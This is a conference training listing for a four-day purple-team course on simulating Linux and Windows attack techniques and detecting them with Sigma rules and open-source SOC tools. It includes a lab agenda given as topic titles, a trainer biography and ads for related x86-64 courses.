In & Out – COMBO Attack, Detection & Hunting with PurpleLabs
4-Day Training | Hybrid
| 21-24 November 2021

In & Out – COMBO Attack, Detection & Hunting with PurpleLabs

Participants will thoroughly familiarize themselves with the content of the available Sigma detection rules and their structure, better understand the essence of offensive actions, learn the low-level relationships between data sources, and thus achieve knowledge in creating their own detection rules (and eventually bypassing them).
Founder, Defensive Security

Available seats

TBA

Difficulty

Intermediate
US$ 4,299

Attend in-person

at ADNEC Abu Dhabi

Attend online

via livestream

Date

21-24 November 2021

Time

09:00 to 17:00 GST/GMT+4

Make sure you're choosing the right course. This is the 4-day Combo course for both Linux and Windows. The 2-day Linux course is HERE. and the 2-day Windows version is HERE!

The primary goal of this training is to show and teach you how to generate offensive attack events/symptoms that you will detect in parallel by using PurpleLABS SOC stack powered by Sigma Rules - the open standard event description ruleset - and the rest of the dedicated, Open Source security solutions in use.

Participants will thoroughly familiarize themselves with the content of the available Sigma detection rules and their structure, better understand the essence of offensive actions, learn the low-level relationships between data sources, and thus achieve knowledge in creating their own detection rules (and eventually bypassing them).

The “In & Out - Attack, Detection & Hunting with PurpleLabs” is an intermediate hands-on PurpleLABS training created to present:

  • The value of the Assume Breach approach and simulation of threats after getting early access to the target. (Discovery, C2, Lateral Movement, Persistence, Evasion, Exfiltration, Execution, Credential Access)
  • The importance of Blue and Red team cooperation and how to effectively run hunting activities and write security notes.
  • “Feel the network and systems” approach to get and understand the baseline behavior of devices, OS and network.
  • Different ways for playing with many important data sources including Sysmon, Windows Event Logs, Syslog, Falco, Yara, eBPF, Zeek, Suricata, OSQuery, memory dumps and Full Packet Captures.
  • How to run adversary simulations effectively including a development of Attack Paths and Chain Attack scenarios by combining the attacker's techniques, tactics and procedures.
  • Visibility, detection methods and capabilities of well recognized Hunting and Detection tools including HELK, Splunk, Elastiflow, Moloch, Kolide Fleet, Wazuh, Graylog, theHive and MISP.
  • The potential of Sigma rules (+ElastAlert) and their values ​​for SIEM engines.
  • Engineering and analytical skills required to work in the Security Operation Center environment.
  • Verification methods and techniques for Cyber Security product and service providers → in terms of internal testing and supporting PoC / PoV programs.
Go HERE to join the Linux course version instead. Or,
Go HERE to join the Windows course version
  • Red and Blue team members
  • Security / Data Analytics
  • CSIRT / Incident Response Specialists
  • IT Security Professionals, Experts & Consultants
  • Network Security Engineers
  • SOC members and SIEM Engineers
  • AI / Machine Learning Developers
  • Open Source Security Enthusiasts
  • An intermediate level of command-line syntax experience using Linux and Windows
  • Fundament knowledge of TCP/IP network protocols
  • Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required
  • Basic programming skills are a plus, but not essential

This course takes on an “Adversary Simulations vs Hunting” approach in a condensed format. This will allow a gradual escalation of the level of knowledge in the scope of red / blue / purple teaming to both experienced specialists and beginners while maintaining the attractiveness and pleasure of performed tasks. Detection does not have to be boring and tedious!

  • Realistic 100% pure lab-oriented offensive and defensive security use cases.
  • Minimum theory, maximum hands -on with high level of expertise.
  • A lot of accumulated knowledge in one place with a focus on high priority elements.
  • Learn current trends, techniques, and offensive tools for Discovery, C2, Lateral Movement, Persistence, Evasion, Exfiltration, Execution, Credential Access against Linux and AD Windows machines.
  • Learn ways to improve detection and sharpen your event correlation skills across many different data sources.
  • Find the malicious activities and identify threat details on the network.
  • Prepare your SOC team for fast filtering out network noise and allow for better incident response handling.
  • Find out how Detection / DFIR Open Source Software can support your SOC infrastructure.
  • Understand values of manual and automated approach to simulate attackers and generate anomalies.
  • Identify blind spots in your network security posture.

This training is based on dedicated PurpleLABS virtual infrastructure (https://www.defensive-security.com/purplelabs/), so there are no special student’s desktop requirements. No more initial setup issues, just a pure training experience. Every student will gain full access to the PurpleLabs environment for 30 days after the training.

  • VPN client installed according to VPN Setup instructions
  • Slack account as an invite to dedicated training channel will be sent
  • Stable internet connection

Recommended:

  • Zoom client installed
  • HD Camera to have 1:1 access to an instructor and the rest of the participants.

+Testimonials

The content of in and out was great. Lots of gained knowledge and hands on!

Leszek Miś is very knowledgeable in the topics covered in the course. He also shares real life scenarios which were useful for participants to better understand application of material presented. Contents were very good, it covers many leading open source projects which I find useful. I would recommend this course to my colleagues.

Leszek was a really good trainer, he covered a lot of material, and had a very good personality.

Great course! A truly huge number of topics and tools covered

The content of in and out was great. Lots of gained knowledge and hands on!

+agenda

Title

Details

Date

By default, all hands-on lab scenarios have been categorized by Tactics:
  • Initial Access (TA001)
  • Execution (TA002)
  • Persistence (TA003)
  • Privilege Escalation (TA004)
  • Defense Evasion (TA005)
  • Credential Access (TA006)
  • Discovery (TA007)
  • Lateral Movement (TA008)
  • Collection (TA009)
  • Command and Control (TA0011)
  • Exfiltration (TA0010)
  • Impact (TA0040)
  • Breach and Attack Simulations
  • Forensics
21-23 November 2021
Linux RED vs BLUE HANDS-ON LABS INDEX:
  • Introduction to PurpleLabs
  • Current state of Linux malware / APT campaigns
  • Analysis of Linux C2 implants and interesting post-exploitation modules
  • Linux LOLbins / one-liners for bind & reverse shells, download/upload, file compression
  • Linux Network / Service / User / Local Enumeration
  • /proc exploration
  • Linux ELF in-memory code execution vs live process analysis
  • Linux syscall faulting for C2 agent execution
  • Injecting an ELF file into a remote Linux process
  • Linux GDB Shared Library Injection
  • Linux sshd Injection + password extraction
  • Linux Apache rootkit + command execution over HTTP
  • Linux kernel space rootkits and backdoors vs LKRG
  • Building Linux custom payloads
  • Linux Runtime Security / syscall filtering / kernel instrumentation using falco, tracee and systemtap
  • Linux persistence and hunting methods
  • Linux process hiding and in-memory code injection techniques
  • Linux buffer overflow / privilege escalation artifacts
  • Linux hardening best practices / OpenSCAP
  • Chroot / nsjail / SELinux / caps / seccomp vs exploitation
  • Socket command execution
  • Auditd vs Falco vs Tracee vs local adversary simulations
  • Invoking Linux Reverse shell from kernel space in response to ICMP
  • Linux shells over hidden ICMP channel
  • Data exfiltration over DNS vs detection
  • Pwn remote docker host over DNS rebinding
  • Escaping Docker containers
  • In-memory DNS AAAA implant for Linux
  • DNS AXFR Payload Delivery
  • SSH tunneling, lateral movement and pivoting vs HASSH
  • HTTP2 Exfiltration and DNS over HTTPS C2
  • Playing with LDAP as payload delivery channel / hidden storage
  • Tunneling traffic into internal networks
  • Port Knocking vs Full Packet Capture Analysis
  • Mutual TLS / SSL C2 communication vs JA3 / JARM
  • SNI-based TLS data exfiltration
  • The world of web shells vs Yara / OSquery / Velociraptor detection at scale
  • Threat Hunting and Detection with Web Proxy Logs
  • Linux Memory Forensics using Volatility Framework
  • The importance of Linux Process trees
  • HTTP exfiltration and covert channels based on UA, cookies / encrypted cookies, WebDAV, WebSockets
  • Youtube-based command delivery and execution
  • Google Translator as a C2 Proxy
  • Overview of Linux Security Benchmarks / Linux Hardening guides vs PurpleLabs offensive content
  • Introduction to Fapolicyd framework
  • Introduction to FreeIPA - a “domain controller” for Linux clusters
  • Linux Tips and Tricks for Rapid Triage
  • and more
21-23 November 2021
Windows RED vs BLUE HANDS-ON LABS INDEX:
  • Introduction to PurpleLabs
  • Current state of Windows malware / APT campaigns
  • Analysis of Windows C2 implants and interesting post-exploitation modules (execute-shellcode, execute-assembly)
  • Using malleable C2 profiles over Empire Framework
  • LOLbins / one-liners for bind & reverse shells, download/upload, file compression tricks
  • Active Directory Network / local Enumeration
  • AD Kerberos password spraying and brute-forcing
  • Windows Integrity Levels
  • Evil-WinRM pivoting + Ghostpack enumeration
  • Bypassing UAC over Koadic C3, Empire, Metasploit
  • Dump lsass at scale and detection
  • AD Credential Dumping using Impacket’s secretsdump
  • Dumping DC Hashes via wmic and Vssadmin Shadow Copy
  • PPID spoofing and command argument spoofing
  • DLL Hijacking against MSDTC service for persistence
  • Windows OCI DLL Hijacking
  • Windows Process Injection / Hollowing Techniques
  • Windows CMSTP + Rundll Network Connection
  • Windows MSBuild In-memory Code Execution
  • Windows MSHTA + Windows Script Component
  • Windows Bitsadmin
  • Windows New Firewall Rule
  • Windows Sharpshooter + Metasploit Framework + SMB Named Pipe Pivoting
  • Windows Schtasks Persistence
  • Windows Application Shimming Persistence
  • Windows AMSI-Provider for Persistence
  • Windows Winlogon Helper DLL Persistence
  • Windows ADS NTFS persistence and hiding
  • Windows AD Skeleton Key Persistence
  • Differences in behavior between dcomexec / psexec / wmiexec / smbexec / atexec / wmiexec + Pass The Hash
  • Evading Sysmon and Windows Event Logging
  • SMB named pipes for Lateral movement
  • RDP no-GUI Remote Command Execution
  • Ask for Windows passwords from Powershell
  • Shad0w beacons
  • Donuts, donuts, anyone?
  • The power of SharpDPAPI
  • Windows Pcap driver installation
  • AD Silver and Golden tickets
  • Kerberoasting / DCsync / DCShadow
  • Tunneling traffic into internal networks
  • Mutual TLS / SSL C2 communication
  • SNI-based TLS data exfiltration
  • Clone, armor, and phish popular websites and use them for covert channel
  • Playing “QUIC” network exfil game
  • Local network scanning from the pwned OS/browser through XSS
  • Octopus AES-256 Encrypted C2
  • Playing with PoshC2 post-exploitation modules
  • Network/exfiltration modules of Nishang, PowerSploit, Powercat, Empire
  • Infection Monkey Automated Adversary Simulations
  • Network Flight Simulator / testIDS
  • Purple Team ATT&CK Automation
  • Atomic Red Team Simulations
  • PurpleSharp Simulations
  • Playing with CME + atsvc
  • Analysis of a collection of Windows print spooler exploits
  • Word Exploitation and detection (CVE-2021-40444)
  • PetitPotam – NTLM Relay to AD CS
  • Sliver C2 extensions
  • Process scanning at scale against malicious behavior - Velociraptor + hollow_hunter
  • APT Lazarus simulation vs hunting
  • Emulating and hunting for APT29 / FIN7 / FIN6 / menuPass / Hafnium / Carbanak
  • Windows Rapid Triage using Velociraptor IR
  • The power of Mordor and EVTX-ATTACK-SAMPLES vs HELK
  • DNSStager for payload delivery over DNS vs dns.log
  • and more
21-23 November 2021

Book your spot for this training

+TRAINERS

Leszek Miś
Founder, Defensive Security

Leszek Miś is the Founder of Defensive Security (​www.defensive-security.com​), Principal Trainer and Security Researcher with over 16 years of experience in Cyber Security and Open Source Security Solutions market. He went through the full path of the infosec carrier positions: from OSS researcher, Linux administrator, and system developer and DevOps, through penetration tester and security consultant delivering hardening services and training for the biggest players in the European and global market, to become finally an IT Security Architect / SOC Security Analyst with deep non-vendor focus on Network Security attack and detection. He’s got deep knowledge about finding blind spots and security gaps in corporate environments. Perfectly understands technology and business values from delivering structured, automated adversary simulation platform.

Recognized speaker and trainer: BruCON 2017/2018, Black Hat USA 2019, OWASP Appsec US 2018, FloCon USA 2018, Hack In The Box Dubai / Amsterdam / Singapore / Abu Dhabi 2018/2019/2020, 44CON UK 2019, Confidence PL, PLNOG, Open Source Day PL, Secure PL, Advanced Threat Summit PL

Member of OWASP Poland Chapter.

Author of many IT Security trainings:

  • Open Source Defensive Security → The Trinity of Tactics for Defenders
  • In & Out → Network Exfiltration and Post-Exploitation Techniques [RED EDITION]
  • In & Out → Detection of Network Exfiltration and Post-Exploitation Techniques [BLUE EDITION]
  • System Internals – Network, OS and Memory Forensics
  • SELinux → Development & Administration of Mandatory Access Control Policy
  • Advanced RHEL/CentOS Defensive Security & Hardening
  • ModSecurity → Development and Management of Web Application Firewall rules
  • FreeIPA → Identity Management for Linux Domain Environments & Trusts

Holds many certifications: OSCP, RHCA, RHCSS, Splunk Certified Architect.

His areas of interest include network “features” extraction, OS internals and forensics. Constantly tries to figure out what the AI/ML Network Security vendors try to sell. In free time he likes to break into “IoT world” just for fun. Still learning hard every single day.

 

+OTHER COURSES YOU MIGHT BE INTERESTED IN

x86-64 All You Can Learn Buffet!
US$ 4,299
x86-64 All You Can Learn Buffet!

This class is run a little different from most classes. We provide you purpose-built recorded lectures instead of trapping you in realtime with live-lectures. But fear not, the instructor is always right there eagerly waiting to mingle with the students and answer any questions you have. (The instructor really likes being asked questions. It shows you're paying attention ;)). One of many benefits is that you can watch lectures at 2x speed and zoom ahead of the other students and get to the hands on labs quicker. Or if there's bits of material you already know, you can just skip them and move on to the bits you don't know! Another big benefit is that you get to take the full lectures and labs with you! That means if you forget stuff and then need it in 6 months, you can quickly re-bootstrap yourself! Or you can watch the class twice, to really grow those neural connections and cement it in your brain! And unlike live lectures, our lectures are always getting more factually accurate, by having any accidental errors edited out.


Go HERE to join the 2-day x86-64 Assembly class. Or,
Go HERE to join the 2-day x86-64 OS Internals class. Or,
Go HERE to join the 4-day x86-64 Reset Vector Firmware class.
4-Day Training Hybrid
x86-64 Reset Vector Firmware
US$ 2,299
x86-64 Reset Vector Firmware

This class is designed to give you all the background you need to understand how x86-64 reset vector firmware works, and what the most common security misconfigurations are. It will prepare you to be able to read and understand the existing attack and defense research in the space, taking an explicit walk through of the attack and defense moves and counter-moves threat tree. And as always, this classes teaches you to be comfortable with Reading The Fun Manual (RTFM!) to go seek out the most accurate details of how things work, and to see out new problems in new areas that no one's read yet with a security mindset.

You can also opt to attend this class on 23 & 24 Nov instead. To do so, just email info@cyberweek.ae

Go HERE to join the 2-day x86-64 Assembly class. Or,
Go HERE to join the 2-day x86-64 OS Internals class. Or,
Go HERE to join the 4-day x86-64 All You Can Learn Buffet class.
2-Day Training Hybrid
x86-64 OS Internals
US$ 2,299
x86-64 OS Internals

This class teaches you about the fundamental hardware mechanisms which all operating systems, virtualization systems, and firmware *must* interact with in order to run successfully on x86 hardware. This is taught in a *mostly* OS-agnostic way focusing on Intel-isms rather than OS-isms (albeit with using Windows as reinforcement, thanks to its excellent kernel-level debugging support.) This class also teaches you to be comfortable with Reading The Fun Manual (RTFM!) to give you self-sufficiency when seeking out the most accurate details of how things work.

You can also opt to attend this class on 23 & 24 Nov instead. To do so, just email info@cyberweek.ae

Go HERE to join the 2-day x86-64 Assembly class. Or,
Go HERE to join the 2-day x86-64 Reset Vector Firmware class. Or,
Go HERE to join the 4-day x86-64 All You Can Learn Buffet class.
2-Day Training Hybrid
x86-64 Assembly
US$ 2,299
x86-64 Assembly

This class teaches you how to disassemble binaries, read x86-64 assembly language, and debug black-box binaries in WinDbg and GDB. This knowledge of assembly is the fundamental skill which is required to learn reverse engineering and vulnerability exploitation. Reverse engineering is in turn a fundamental skill which is required for malware analysis and vulnerability hunting.

 

You can also opt to attend this class on 23 & 24 Nov instead. To do so, just email info@cyberweek.ae

 
Go HERE to join the 2-day x86-64 OS Internals class. Or,
Go HERE to join the 2-day x86-64 Reset Vector Firmware class. Or,
Go HERE to join the 4-day x86-64 All You Can Learn Buffet class.  
2-Day Training Hybrid